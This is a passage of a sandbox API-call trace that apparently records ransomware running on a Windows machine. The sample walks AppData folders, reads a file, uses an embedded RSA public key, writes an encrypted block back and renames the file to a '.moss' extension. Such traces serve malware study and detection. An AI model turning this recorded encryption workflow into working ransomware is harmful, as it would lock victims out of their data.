hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.213] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.213] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a070 [0173.213] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\") returned="VGMTOI09\\" [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f2a8 [0173.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46080 [0173.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0173.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0173.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0173.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57d98 [0173.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.214] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.214] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.215] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.215] PathFindFileNameW (pszPath="") returned="" [0173.215] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.215] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.215] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned=".xml" [0173.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.217] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=836) returned 1 [0173.217] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.220] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x31e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.220] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0173.222] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0173.222] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x344, lpOverlapped=0x0) returned 1 [0173.222] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.222] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0173.222] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.223] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0173.223] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0173.224] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0173.224] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0173.224] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0173.224] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0173.224] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0173.224] GetLastError () returned 0x0 [0173.224] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0173.224] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0173.224] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0173.224] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0173.224] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.224] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0173.224] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.224] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0173.224] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x340) returned 0x3b48820 [0173.224] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0173.225] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b48b68 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57d98 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e8c8 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57de0 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e8e0 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e910 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e928 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0173.225] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0173.225] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b44498 [0173.225] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e910 | out: hHeap=0xcd0000) returned 1 [0173.225] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e928 | out: hHeap=0xcd0000) returned 1 [0173.225] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0173.225] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0173.225] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e928 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e910 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa27b8 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e928 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e910 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0173.226] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0173.226] GetCurrentThreadId () returned 0x324 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b55030 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0173.226] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed88 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0xd23a00 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.227] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.227] GetCurrentThreadId () returned 0x324 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.227] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xdc53e8 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.227] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.227] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.227] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0173.227] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0173.227] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0173.227] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0173.228] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0173.228] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0173.228] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e910 [0173.228] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0173.228] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0173.228] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0173.228] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0173.228] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0173.228] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x344, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.228] WriteFile (in: hFile=0x664, lpBuffer=0x35ceae8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35ceae8*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.228] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0173.229] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.moss")) returned 1 [0173.229] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0173.229] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.229] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.231] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0173.231] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 0 [0173.231] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.231] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0173.231] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a070 | out: hHeap=0xcd0000) returned 1 [0173.231] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.231] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\") returned="security\\" [0173.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0173.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0173.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0173.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.232] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.232] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.232] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.232] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.232] PathFindFileNameW (pszPath="") returned="" [0173.232] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.233] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.233] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.233] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.234] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.234] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0173.234] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46080 | out: hHeap=0xcd0000) returned 1 [0173.234] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.234] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0173.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0173.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0173.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0173.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.234] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.235] 